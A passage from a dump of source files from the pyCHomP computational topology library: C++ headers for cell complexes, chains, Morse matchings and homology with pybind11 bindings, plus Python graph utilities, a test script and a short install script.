"text": "// common.h\n/// Shaun Harker 2017-01-25-2341\n/// MIT LICENSE\n\n#pragma once\n\n#include <iostream>\n#include <cstdint>\n#include <numeric>\n#include <memory>\n#include <fstream>\n#include <string>\n#include <vector>\n#include <unordered_set>\n#include <unordered_map>\n#include <algorithm>\n#include <functional>\n#include <queue>\n#include <limits>\n#include <stack>\n#include <iterator>\n#include \"hash.hpp\"\n\n// Debug\n\ninline void\nprint_vector (std::vector<uint64_t> const& v, std::string name) { \n std::cout << name << \" == [\"; for ( auto x : v ) std::cout << x << \",\"; std::cout << \"]\\n\";\n}\n"
},
{
"alpha_fraction": 0.7187322974205017,
"alphanum_fraction": 0.7277871966362,
"avg_line_length": 31.72222137451172,
"blob_id": "39fca96a52858279402cb807fd5b711dd2fd9d81",
"content_id": "7fa00084e09560017ae61c1edd6e47358dfbf236",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1767,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 54,
"path": "/src/pychomp/_chomp/include/MorseGradedComplex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// MorseGradedComplex.h\n/// Shaun Harker\n/// 2017-07-20\n/// MIT LICENSE\n\n#pragma once\n\n#include <memory>\n#include <vector>\n\n#include \"Integer.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"MorseComplex.h\"\n#include \"MorseMatching.h\"\n#include \"GradedComplex.h\"\n\n/// MorseGradedComplex\ninline\nstd::shared_ptr<GradedComplex> \nMorseGradedComplex ( std::shared_ptr<GradedComplex> base_graded_complex, \n std::shared_ptr<MorseMatching> matching ) {\n\n std::shared_ptr<MorseComplex> complex ( new MorseComplex(base_graded_complex -> complex(), matching) );\n\n // Convert indices of cells to compute new graded_complex mapping (map from cell index to poset vertex number)\n std::vector<Integer> graded_complex_mapping(complex -> size());\n for ( auto x : *complex ) {\n Chain included = complex -> include ({x});\n graded_complex_mapping[x]= base_graded_complex -> value(*included.begin());\n }\n\n return std::shared_ptr<GradedComplex>( new GradedComplex(complex, [=](Integer x){return graded_complex_mapping[x];}));\n}\n\n/// MorseGradedComplex\ninline\nstd::shared_ptr<GradedComplex> \nMorseGradedComplex ( std::shared_ptr<GradedComplex> base_graded_complex ) {\n std::shared_ptr<MorseMatching> matching ( MorseMatching::compute_matching(base_graded_complex) );\n return MorseGradedComplex (base_graded_complex, matching);\n}\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline\nvoid MorseGradedComplexBinding(py::module &m) {\n m.def(\"MorseGradedComplex\", (std::shared_ptr<GradedComplex>(*)(std::shared_ptr<GradedComplex>,std::shared_ptr<MorseMatching>))&MorseGradedComplex);\n m.def(\"MorseGradedComplex\", (std::shared_ptr<GradedComplex>(*)(std::shared_ptr<GradedComplex>))&MorseGradedComplex);\n}\n"
},
{
"alpha_fraction": 0.5125628113746643,
"alphanum_fraction": 0.5237297415733337,
"avg_line_length": 29.355932235717773,
"blob_id": "12fa17e2f3de42ad514895c04df746d361766047",
"content_id": "369384941069d4530e2f8dbd4dc0792b64b9a68d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1791,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 59,
"path": "/src/pychomp/_chomp/include/Grading.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// Valuation.h\n/// Shaun Harker\n/// 2018-03-09\n/// MIT LICENSE\n\n#pragma once\n\n#include \"common.h\"\n\nstd::function<Integer(Integer)>\nconstruct_grading ( std::shared_ptr<Complex> c, \n std::function<Integer(Integer)> top_cell_grading ) {\n // Copy top_cell_grading (with offset)\n std::vector<Integer> top_cell_grading_;\n top_cell_grading_.resize(c->size(c->dimension()));\n Integer num_nontop_cells_ = c->size() - c->size(c->dimension());\n for ( auto v : (*c)(c->dimension()) ) {\n top_cell_grading_[v - num_nontop_cells_] = top_cell_grading(v);\n }\n return [=](Integer x) { \n // std::cout << \"grading function\\n\";\n // std::cout << \"top_cell_grading_.size() == \" << top_cell_grading_.size() << \"\\n\";\n // std::cout << \"c -> size() == \" << c -> size() << \"\\n\";\n Integer min_value = -1;\n // for ( auto v : *c ) {\n // std::cout << \"c -> topstar(v) .size() == \" << c ->topstar(v).size() << \"\\n\";\n // }\n // std::cout << \"grading of \" << x << \"\\n\";\n\n for ( auto v : c->topstar(x) ) {\n // std::cout << \" top cell \" << v << \"\\n\";\n // std::cout << \" minvalue = \" << min_value << \"\\n\";\n auto new_val = top_cell_grading_[v - num_nontop_cells_];\n // std::cout << \" new_val = \" << new_val << \"\\n\";\n if ( min_value == -1 ) {\n // std::cout << \" A\\n\";\n min_value = new_val;\n } else {\n // std::cout << \" B\\n\";\n min_value = std::min(min_value, new_val);\n }\n }\n // std::cout << \"returning. minvalue = \" << min_value << \"\\n\";\n return min_value;\n };\n}\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\n#include <pybind11/functional.h>\n\nnamespace py = pybind11;\n\ninline void\nGradingBinding(py::module &m) {\n m.def(\"construct_grading\", &construct_grading);\n}\n"
},
{
"alpha_fraction": 0.5222392678260803,
"alphanum_fraction": 0.5360429286956787,
"avg_line_length": 20.37704849243164,
"blob_id": "a549561ddf87c98c4a0bcbc0fe55c1a4e7cf4591",
"content_id": "327362df5d920dfe5fd386e822cb2692e5e9cc19",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1304,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 61,
"path": "/src/pychomp/_chomp/include/Chain.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// Chain.h\n/// Shaun Harker\n/// 2017-07-19\n/// MIT LICENSE\n\n#pragma once\n\n#include <unordered_set>\n#include <iostream>\n\n#include \"Integer.h\"\n\ntypedef std::unordered_set<Integer> Chain; \n\ninline void \noperator += ( Chain& lhs, Integer rhs ) { \n if ( lhs.count(rhs) ) lhs.erase(rhs); else lhs.insert(rhs);\n}\n\ninline void \noperator += ( Chain& lhs, Chain const& rhs ) {\n for ( auto x : rhs ) lhs += x;\n}\n\ninline Chain\noperator + ( Chain const& lhs, Chain const& rhs ) {\n Chain result;\n result += lhs;\n result += rhs;\n return result;\n}\n\ninline std::ostream &\noperator << ( std::ostream & outstream, Chain const& print_me ) {\n outstream << \"[\";\n for ( auto x : print_me ) outstream << x << \",\";\n outstream << \"]\";\n return outstream;\n}\n\n/// Python Bindings\n// Note: using default STL wrapper for Chain\n\n// #include <pybind11/pybind11.h>\n// #include <pybind11/stl.h>\n// namespace py = pybind11;\n//\n//\n// void ChainBinding(py::module &m) {\n// py::class_<Chain>(m, \"Chain\")\n// .def(py::init<>())\n// .def(py::init<std::vector<uint64_t> const&>())\n// .def(\"__str__\", )\n// .def(\"__repr__\", )\n// .def(\"__add__\", )\n// .def(\"__iadd__\", )\n// .def(\"__sub__\", )\n// .def(\"__isub__\", )\n// .def(\"__iter__\", )\n// .def(\"__len__\", ).\n// }\n"
},
{
"alpha_fraction": 0.5755584836006165,
"alphanum_fraction": 0.5860709547996521,
"avg_line_length": 25.241378784179688,
"blob_id": "6bf08df31652922939af81ffb8422dcee0fe48df",
"content_id": "ee88901ca25e8c16328fb1960698d2969292f1e3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 761,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 29,
"path": "/src/pychomp/InducedSubgraph.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "# InducedSubgraph.py\n# Shaun Harker\n# MIT LICENSE\n# 2018-03-12\n\nfrom pychomp.DirectedAcyclicGraph import *\nfrom pychomp.Poset import *\n\ndef InducedSubgraph( G, predicate ):\n result = DirectedAcyclicGraph()\n S = set([v for v in G.vertices() if predicate(v)])\n for v in S:\n result.add_vertex(v)\n for v in S:\n for u in G.adjacencies(v):\n if u in S and u != v:\n result.add_edge(v,u)\n return result\n\ndef InducedPoset( G, predicate ):\n result = DirectedAcyclicGraph()\n S = set([v for v in G.vertices() if predicate(v)])\n for v in S:\n result.add_vertex(v)\n for v in S:\n for u in G.descendants(v):\n if u in S and u != v:\n result.add_edge(v,u)\n return Poset(result)\n"
},
{
"alpha_fraction": 0.7198067903518677,
"alphanum_fraction": 0.7198067903518677,
"avg_line_length": 33.5,
"blob_id": "8ed51d6e75e92d50fb9f7cd95362e2331cff978b",
"content_id": "f52304794e926596b31437e9353845987db6778b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 207,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 6,
"path": "/install.sh",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "# installer script\nrm -rf build\nrm -rf dist\ngit submodule update --init --recursive\n#pip install . --ignore-installed --no-cache-dir\npip install . --upgrade --no-deps --force-reinstall --no-cache-dir --user\n"
},
{
"alpha_fraction": 0.686165988445282,
"alphanum_fraction": 0.7011857628822327,
"avg_line_length": 22.425926208496094,
"blob_id": "4b59ec982ae36914843adb19c086fa5e33ea6461",
"content_id": "a6dd21a109a4db1769b60a301331105851eda300",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1265,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 54,
"path": "/src/pychomp/_chomp/include/MorseMatching.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// MorseMatching.h\n/// Shaun Harker\n/// 2017-07-19\n/// MIT LICENSE\n\n#pragma once\n\n#include <memory>\n#include <unordered_set>\n#include <vector>\n\n#include \"Integer.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"GradedComplex.h\"\n\nclass MorseMatching {\npublic:\n typedef std::vector<Integer> BeginType; // To store location of first cell of each dim\n typedef std::vector<std::pair<Integer,Integer>> ReindexType; // To convert indexing\n\n /// mate\n virtual Integer mate ( Integer x ) const = 0;\n\n /// priority\n virtual Integer priority ( Integer x ) const = 0;\n\n /// critical_cells\n virtual std::pair<BeginType const&,ReindexType const&>\n critical_cells ( void ) const = 0;\n\n /// compute_matching\n static\n std::shared_ptr<MorseMatching>\n compute_matching ( std::shared_ptr<Complex> complex );\n\n /// compute_matching\n static\n std::shared_ptr<MorseMatching>\n compute_matching ( std::shared_ptr<GradedComplex> graded_complex );\n};\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nMorseMatchingBinding(py::module &m) {\n py::class_<MorseMatching, std::shared_ptr<MorseMatching>>(m, \"MorseMatching\") \n .def(\"mate\", &MorseMatching::mate)\n .def(\"priority\", &MorseMatching::priority);\n}\n"
},
{
"alpha_fraction": 0.3636363744735718,
"alphanum_fraction": 0.5090909004211426,
"avg_line_length": 12.5,
"blob_id": "b1e48cbdbb3abf96151b50c4ce6a277b992ef6a2",
"content_id": "95162b6d014f65b91a8418ff978e4e9542186c5a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 55,
"license_type": "permissive",
"max_line_length": 15,
"num_lines": 4,
"path": "/src/pychomp/_chomp/include/Poset.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// Poset.h\n/// Shaun Harker\n/// 2018-03-13\n/// MIT LICENSE\n\n"
},
{
"alpha_fraction": 0.7076685428619385,
"alphanum_fraction": 0.7112712264060974,
"avg_line_length": 36.36538314819336,
"blob_id": "db62534bb452f4ba8cc06652be006353ee542994",
"content_id": "b0a0a13c0f7e0244d42bc87a1f5d5e8b83870b98",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1943,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 52,
"path": "/src/pychomp/FlowGradedComplex.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "### FlowGradedComplex.py\n### MIT LICENSE 2016 Shaun Harker\n\nfrom pychomp._chomp import *\nfrom pychomp.CondensationGraph import *\nfrom pychomp.StronglyConnectedComponents import *\nfrom pychomp.DirectedAcyclicGraph import *\nfrom pychomp.Poset import *\n\ndef FlowGradedComplex(complex, discrete_flow):\n \"\"\"\n Overview:\n Given a complex and a graph on its top dimensional cells,\n produce a GradedComplex such that the preimage of a down set\n is the collection of cells in the closure of all the \n associated top cells\n Inputs:\n complex : a complex\n flow_graph : a function from vertices to out-adjacent vertices\n Algorithm:\n Apply strongly connected components algorithm and determine\n reachability relation among the strong components to learn\n a poset. Associated to each poset vertex is a collection of\n top cells. \n \"\"\"\n\n # Step 1. Compute the poset of strongly connected components\n \n vertices = [ cell for cell in complex(complex.dimension())]\n (dag, mapping) = CondensationGraph(vertices, discrete_flow)\n #poset = Poset(dag)\n\n # Step 2. Extend the mapping from top-cells to all cells\n # Basic idea: since the component indexing furnishes a linear\n # extension of the poset, we assign each cell to \n # the minimum indexed poset which contains a top cell\n # it is incident.\n\n\n # for cell in reversed(range(0,len(complex))):\n # current_value = mapping[cell]\n # for bd_cell in complex.boundary({cell}):\n # mapping[bd_cell] = min(mapping.get(bd_cell,current_value), current_value)\n\n #num_nontop_cells = complex.size() - complex.size(complex.dimension())\n\n #valuation = lambda x : min([mapping[z] for z in complex.star(x) if z >= num_nontop_cells])\n\n grading = construct_grading(complex, lambda x : mapping[x] );\n return dag, GradedComplex(complex, grading) # lambda x : mapping[x])\n\n #return poset, chompy.GradedComplex(complex, lambda x : mapping[x])\n"
},
{
"alpha_fraction": 0.5798554420471191,
"alphanum_fraction": 0.5861506462097168,
"avg_line_length": 23.095504760742188,
"blob_id": "e98f97765ba79754ac199f0c8793eaae4198d274",
"content_id": "4f59415fc921de5239fa45376724ed1951a9ff17",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4289,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 178,
"path": "/src/pychomp/_chomp/include/Complex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// Complex.h\n/// Shaun Harker\n/// 2017-07-18\n/// MIT LICENSE\n\n#pragma once\n\n#include \"common.h\"\n\n#include \"Integer.h\"\n#include \"Iterator.h\"\n#include \"Chain.h\"\n\n/// Complex\nclass Complex {\npublic:\n\n /// virtual destructor\n virtual\n ~Complex ( void ) {}\n\n /// boundary\n virtual Chain\n boundary ( Chain const& chain ) const {\n Chain result;\n auto callback = [&](Integer bd_cell){result += bd_cell;};\n for ( auto x : chain ) column(x, callback);\n return result;\n }\n\n /// coboundary\n virtual Chain\n coboundary ( Chain const& chain ) const {\n Chain result;\n auto callback = [&](Integer bd_cell){result += bd_cell;};\n for ( auto x : chain ) row(x, callback);\n return result; \n }\n\n /// closure\n virtual std::unordered_set<Integer>\n closure ( std::unordered_set<Integer> cells ) const {\n std::unordered_set<Integer> result;\n std::stack<Integer> work_stack;\n for ( auto cell : cells) work_stack.push(cell);\n while ( not work_stack.empty() ) {\n auto v = work_stack.top();\n work_stack.pop();\n if ( result.count(v) ) continue;\n result.insert(v);\n for ( auto u : boundary({v}) ) {\n work_stack.push(u);\n }\n }\n return result;\n }\n\n /// star\n virtual std::unordered_set<Integer>\n star ( std::unordered_set<Integer> cells ) const {\n std::unordered_set<Integer> result;\n std::stack<Integer> work_stack;\n for ( auto cell : cells) work_stack.push(cell);\n while ( not work_stack.empty() ) {\n auto v = work_stack.top();\n work_stack.pop();\n if ( result.count(v) ) continue;\n result.insert(v);\n for ( auto u : coboundary({v}) ) {\n work_stack.push(u);\n }\n }\n return result;\n }\n\n /// topstar\n /// return top dimensional cells in star\n virtual std::vector<Integer>\n topstar ( Integer cell ) const {\n Integer N = size() - size(dimension());\n std::vector<Integer> result;\n for ( auto v : star({cell}) ) {\n if ( v >= N ) result.push_back(v);\n }\n return result;\n }\n\n /// column\n /// Apply \"callback\" method to every element in ith column of\n /// boundary matrix\n virtual void\n column ( Integer i, std::function<void(Integer)> const& callback) const {};\n\n /// row\n /// Apply \"callback\" method to every element in ith row of\n /// boundary matrix\n virtual void\n row ( Integer i, std::function<void(Integer)> const& callback) const {};\n \n /// dimension\n Integer \n dimension ( void ) const {\n return dim_;\n }\n\n /// begin\n Iterator\n begin ( void ) const {\n return begin_[0];\n }\n\n /// end\n Iterator\n end ( void ) const {\n return begin_.back();\n }\n\n /// size\n Integer\n size ( void ) const {\n return * begin_.back();\n }\n\n /// size\n Integer\n size ( Integer d ) const {\n if ( d < 0 || d > dim_ ) return 0;\n return begin_[d+1] - begin_[d];\n }\n\n /// operator ()\n Range\n operator () ( Integer dim ) const {\n return Range(begin_[dim], begin_[dim+1]);\n }\n\n /// count\n std::vector<Integer>\n count ( void ) const {\n std::vector<Integer> result;\n auto D = dimension ();\n for ( Integer d = 0; d <= D; ++ d ) result.push_back(size(d));\n return result;\n }\n\nprotected:\n Integer dim_;\n std::vector<Iterator> begin_; // begin_by_dim_[D+1] == size_;\n};\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nComplexBinding(py::module &m) {\n py::class_<Complex, std::shared_ptr<Complex>>(m, \"Complex\")\n .def(\"dimension\", &Complex::dimension)\n .def(\"boundary\", &Complex::boundary)\n .def(\"coboundary\", &Complex::coboundary)\n .def(\"column\", &Complex::column)\n .def(\"row\", &Complex::row)\n .def(\"closure\", &Complex::closure) \n .def(\"star\", &Complex::star)\n .def(\"topstar\", &Complex::topstar)\n .def(\"__iter__\", [](Complex const& v) {\n return py::make_iterator(v.begin(), v.end());\n }, py::keep_alive<0, 1>())\n .def(\"__call__\", [](Complex const& v, Integer d) {\n return py::make_iterator(v(d).begin(), v(d).end());\n }, py::keep_alive<0, 1>())\n .def(\"__len__\", (Integer(Complex::*)(void)const)&Complex::size)\n .def(\"size\", (Integer(Complex::*)(void)const)&Complex::size)\n .def(\"size\", (Integer(Complex::*)(Integer)const)&Complex::size)\n .def(\"count\", &Complex::count);\n}\n"
},
{
"alpha_fraction": 0.6942675113677979,
"alphanum_fraction": 0.7070063948631287,
"avg_line_length": 21.428571701049805,
"blob_id": "10ae27e06bb5ace4013a3de971b61433fe20ece7",
"content_id": "7c54e5a5280fb199cb71bcaaf35b8208a0f79a34",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 157,
"license_type": "permissive",
"max_line_length": 31,
"num_lines": 7,
"path": "/tests/TestCubicalComplex.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "import chomp\nX = chomp.CubicalComplex([5,5])\nprint(len(X))\nfor cell in X:\n print(X.coordinates(cell))\n print(X.boundary(cell))\n print(X.coboundary(cell))\n"
},
{
"alpha_fraction": 0.6290076375007629,
"alphanum_fraction": 0.6534351110458374,
"avg_line_length": 16.70270347595215,
"blob_id": "6cfcbd726e0e458c78aac21927eca1fcb77b8bc9",
"content_id": "54b697975c20e1d5f6a1df775785c09c36a56f71",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 655,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 37,
"path": "/src/pychomp/_chomp/include/Homology.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// Homology.h\n/// Shaun Harker\n/// 2017-07-20\n/// MIT LICENSE\n\n#pragma once\n\n#include <memory>\n\n#include \"Integer.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"MorseComplex.h\"\n#include \"MorseMatching.h\"\n\n/// Homology\ninline\nstd::shared_ptr<Complex> \nHomology ( std::shared_ptr<Complex> base ) {\n std::shared_ptr<Complex> next = base;\n do {\n base = next;\n next.reset( new MorseComplex ( base ) );\n } while ( next -> size() != base -> size() );\n return base;\n}\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline\nvoid HomologyBinding(py::module &m) {\n m.def(\"Homology\", &Homology);\n}\n"
},
{
"alpha_fraction": 0.592090368270874,
"alphanum_fraction": 0.6158192157745361,
"avg_line_length": 27.54838752746582,
"blob_id": "92657df2389e0abfb41133854c869ae7e0c87211",
"content_id": "57f8d32a7ea6e21caa9f5c5a588d01a0cfa3f83d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 885,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 31,
"path": "/src/pychomp/TopologicalSort.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "# TopologicalSort.py\n# MIT LICENSE 2016\n# Shaun Harker\n\ndef TopologicalSort(vertices, adjacencies):\n \"\"\"\n Topological Sort of a directed acyclic graph (reverse ordered topsort)\n Example:\n vertices = [1,2,3,4,5]\n edges = [(1,2),(2,3),(2,4),(4,5),(3,5),(1,5)]\n adjacencies = lambda v : [ j for (i,j) in edges if i == v ]\n print(TopologicalSort(vertices,adjacencies))\n \"\"\"\n result = []\n preordered = set()\n postordered = set()\n def unvisited_children(u):\n return [ w for w in adjacencies(u) if w not in preordered ]\n for root in vertices:\n if root in preordered: continue\n stack = [root]\n def visit(u): \n if u in preordered: \n if u not in postordered:\n result.append(u)\n postordered.add(u)\n else:\n preordered.add(u)\n stack.extend([u] + unvisited_children(u))\n while stack: visit(stack.pop())\n return result\n"
},
{
"alpha_fraction": 0.5517241358757019,
"alphanum_fraction": 0.6379310488700867,
"avg_line_length": 10.600000381469727,
"blob_id": "a410ed88c2e15239d259c25be22ab0e8b48d6b91",
"content_id": "ae58d4692af6286c4e6ae76552235b38170dacc6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 116,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 10,
"path": "/src/pychomp/_chomp/include/Integer.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// Integer.h\n/// Shaun Harker\n/// 2017-07-18\n/// MIT LICENSE\n\n#pragma once\n\n#include <cstdint>\n\ntypedef int64_t Integer;\n"
},
{
"alpha_fraction": 0.6188151836395264,
"alphanum_fraction": 0.6252496242523193,
"avg_line_length": 34.2109375,
"blob_id": "6d98ad883103758481a3d8bb660b2975e6b1234b",
"content_id": "c8e49c0815f8073d4af6845fe70e5451cc598611",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4507,
"license_type": "permissive",
"max_line_length": 136,
"num_lines": 128,
"path": "/src/pychomp/_chomp/include/CubicalMorseMatching.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// CubicalMorseMatching.h\n/// Shaun Harker\n/// 2018-02-16\n/// MIT LICENSE\n\n#pragma once\n\n#include <memory>\n#include <unordered_set>\n#include <vector>\n\n#include \"Integer.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"GradedComplex.h\"\n#include \"MorseMatching.h\"\n\nclass CubicalMorseMatching : public MorseMatching {\npublic:\n /// CubicalMorseMatching\n CubicalMorseMatching ( std::shared_ptr<CubicalComplex> complex_ptr ) : complex_(complex_ptr) {\n type_size_ = complex_ -> type_size();\n graded_complex_.reset(new GradedComplex(complex_, [](Integer i){return 0;}));\n }\n\n /// CubicalMorseMatching\n CubicalMorseMatching ( std::shared_ptr<GradedComplex> graded_complex_ptr ) : graded_complex_(graded_complex_ptr) {\n complex_ = std::dynamic_pointer_cast<CubicalComplex>(graded_complex_->complex());\n if ( not complex_ ) {\n throw std::invalid_argument(\"CubicalMorseMatching must be constructed with a Cubical Complex\");\n }\n type_size_ = complex_ -> type_size();\n Integer D = complex_ -> dimension();\n Integer idx = 0;\n begin_.resize(D+2);\n for ( Integer d = 0; d <= D; ++ d) {\n begin_[d] = idx;\n for ( auto v : (*complex_)(d) ) { // TODO: skip fringe cells\n if ( ! complex_ -> rightfringe(v) ) {\n if ( mate(v) == v ) { \n reindex_.push_back({v,idx});\n ++idx;\n }\n }\n }\n }\n begin_[D+1] = idx;\n }\n\n /// critical_cells\n std::pair<BeginType const&,ReindexType const&>\n critical_cells ( void ) const {\n return {begin_,reindex_};\n }\n\n /// mate\n Integer\n mate ( Integer x ) const { \n return mate_(x, complex_ -> dimension());\n }\n\n /// priority\n Integer\n priority ( Integer x ) const { \n return type_size_ - x % type_size_;\n }\n\nprivate:\n uint64_t type_size_;\n std::shared_ptr<GradedComplex> graded_complex_;\n std::shared_ptr<CubicalComplex> complex_;\n BeginType begin_;\n ReindexType reindex_;\n\n // def mate(cell, D):\n // for d in range(0, D):\n // if cell has extent in dimension d:\n // left = leftboundary(cell, d)\n // if value(left) == value(cell):\n // if left == mate(left, d):\n // return left\n // else:\n // right = rightcoboundary(cell, d)\n // if value(right) == value(cell):\n // if right == mate(right, d):\n // return right\n // return cell \n // Note: should the complicated formulas (which are also found in CubicalComplex.h not be repeated here?\n // Note: the reason for the \"fringe\" check preventing mating is that otherwise it is possible to \n // end up with a cycle \n // TODO: Furnish a proof of correctness and complexity that this cannot produce cycles.\n Integer mate_ ( Integer cell, Integer D ) const {\n //bool fringe = complex_ -> rightfringe(cell);\n if ( complex_ -> rightfringe(cell) ) return cell; // MAYBE\n //Integer mincoords = complex_ -> mincoords(cell); // TODO: optimize to compute this as it loops through d rather than demanding all\n //Integer maxcoords = complex_ -> maxcoords(cell); // TODO: optimize to compute this as it loops through d rather than demanding all\n Integer shape = complex_ -> cell_shape(cell);\n Integer position = cell % complex_ -> type_size();\n if ( position == complex_ -> type_size() - 1 ) return cell; // Break cycles\n for ( Integer d = 0, bit = 1; d < D; ++ d, bit <<= 1L ) {\n // If on right fringe for last dimension, prevent mating with left boundary\n if ( (d == D-1) && (position + complex_ -> PV()[d] >= complex_ -> type_size()) ) break;\n //if ( fringe && (mincoords & bit) ) continue; // Todo -- is this the best\n //if ( bit & maxcoords ) continue; // Don't connect fringe to acyclic part\n Integer type_offset = complex_ -> type_size() * complex_ -> TS() [ shape ^ bit ];\n Integer proposed_mate = position + type_offset;\n if ( graded_complex_ -> value(proposed_mate) == graded_complex_ -> value(cell) && proposed_mate == mate_(proposed_mate, d) ) { \n return proposed_mate;\n }\n }\n return cell;\n }\n};\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nCubicalMorseMatchingBinding(py::module &m) {\n py::class_<CubicalMorseMatching, std::shared_ptr<CubicalMorseMatching>>(m, \"CubicalMorseMatching\")\n .def(py::init<std::shared_ptr<CubicalComplex>>())\n .def(py::init<std::shared_ptr<GradedComplex>>()) \n .def(\"mate\", &CubicalMorseMatching::mate)\n .def(\"priority\", &CubicalMorseMatching::priority);\n}\n"
},
{
"alpha_fraction": 0.516846776008606,
"alphanum_fraction": 0.516846776008606,
"avg_line_length": 33.9555549621582,
"blob_id": "2440581f7b818104e00104e3662ea6f3fd849452",
"content_id": "76ee872b8df145cfde9de92206ff9899ab33985c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1573,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 45,
"path": "/src/pychomp/DrawGradedComplex.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "# DrawGradedComplex.py\n\nfrom collections import Counter\nimport graphviz\n\nclass DrawGradedComplex:\n def __dir__(self):\n return list(self.__dict__.keys()) + dir(self._a)\n def __getattr__(self, attr):\n return getattr(self._a,attr)\n def __init__(self, a, poset):\n self._a = a\n self.poset = poset\n # Compute preimage\n self.preimage_ = {}\n for v in a.complex():\n val = a.value(v)\n if val not in self.preimage_:\n self.preimage_[val] = set()\n self.preimage_[val].add(v)\n def preimage(self, val):\n if val in self.preimage_:\n return self.preimage_[val]\n else:\n return set()\n def graphviz (self):\n \"\"\" Return a graphviz string describing the graph and its labels \"\"\"\n gv = 'digraph {\\n'\n indices = { v : str(k) for k,v in enumerate(self.poset.vertices())}\n counts = self._a.count()\n #print(counts)\n def vertex_label(v):\n if v in counts:\n return str(v) + \" : \" + str(tuple(counts[v]))\n else:\n return \" \"\n for v in self.poset.vertices(): \n gv += indices[v] + '[label=\"' + vertex_label(v) + ('\", style=filled, fillcolor=cyan];\\n' if self.preimage(v) else '\"];\\n')\n for v in self.poset.vertices(): \n for u in self.poset.children(v):\n gv += indices[v] + ' -> ' + indices[u] + ';\\n'\n return gv + '}\\n'\n\n def _repr_svg_(self):\n return graphviz.Source(self.graphviz())._repr_svg_()\n"
},
{
"alpha_fraction": 0.652466356754303,
"alphanum_fraction": 0.6569506525993347,
"avg_line_length": 43.5,
"blob_id": "006eb1589a685b547916948dceeb6920198afa1d",
"content_id": "9be12a48d6d8d1e63111722bc9bc3aa8ac38fdfd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 892,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 20,
"path": "/src/pychomp/CondensationGraph.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
